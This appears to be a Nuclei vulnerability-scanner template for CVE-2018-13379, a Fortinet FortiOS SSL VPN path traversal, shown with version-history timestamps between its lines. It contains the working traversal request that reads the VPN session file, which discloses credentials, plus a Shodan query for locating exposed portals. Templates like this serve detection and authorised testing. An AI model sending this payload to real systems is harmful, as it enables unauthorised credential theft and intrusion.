2021-01-02 05:00:39 +00:00
id : CVE-2018-13379
2020-04-22 06:42:01 +00:00
info :
2022-05-13 20:26:43 +00:00
name : Fortinet FortiOS - Credentials Disclosure
2020-04-22 06:42:01 +00:00
author : organiccrap
2021-09-10 11:26:40 +00:00
severity : critical
2022-05-13 20:26:43 +00:00
description : Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP resource requests due to improper limitation of a pathname to a restricted directory (path traversal).
2022-04-22 10:38:41 +00:00
reference :
- https://fortiguard.com/advisory/FG-IR-18-384
- https://www.fortiguard.com/psirt/FG-IR-20-233
2022-05-13 20:26:43 +00:00
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2018-13379
cwe-id : CWE-22
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*
epss-score : 0.975
2022-06-25 07:48:45 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2022-06-25 07:48:45 +00:00
verified : true
shodan-query : http.html:"/remote/login" "xxxxxxxx"
2022-07-21 17:18:22 +00:00
tags : cve,cve2018,fortios,lfi,kev
2020-04-22 06:42:01 +00:00
2023-04-27 04:28:59 +00:00
http :
2020-04-22 06:42:01 +00:00
- method : GET
2020-05-25 07:49:06 +00:00
path :
2021-04-20 23:15:12 +00:00
- "{{BaseURL}}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
2022-05-13 20:26:43 +00:00
2022-06-25 07:48:45 +00:00
matchers :
- type : regex
part : body
regex :
- '^var fgt_lang ='
2022-05-13 20:26:43 +00:00
# Enhanced by mp on 2022/05/12